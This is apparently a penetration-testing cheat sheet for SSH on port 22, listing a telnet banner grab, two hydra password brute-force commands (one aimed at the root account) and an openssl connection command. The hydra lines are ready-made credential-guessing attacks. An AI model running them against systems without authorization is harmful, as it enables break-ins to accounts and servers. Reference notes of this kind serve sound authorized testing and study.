22 - SSH

Recon

# Banner grabbing using telnet
telnet IP 22

Bruteforce

# List of users using wordlists
hydra -L users.txt -P <passwordList> -t 3 -s port <IP> ssh

# Only one user and wordlist passwords
hydra -l root -P <passwordList> -t 3 -s port <IP> ssh

OpenSSL

# Connection through openssl
openssl s_client -connect IP:PORT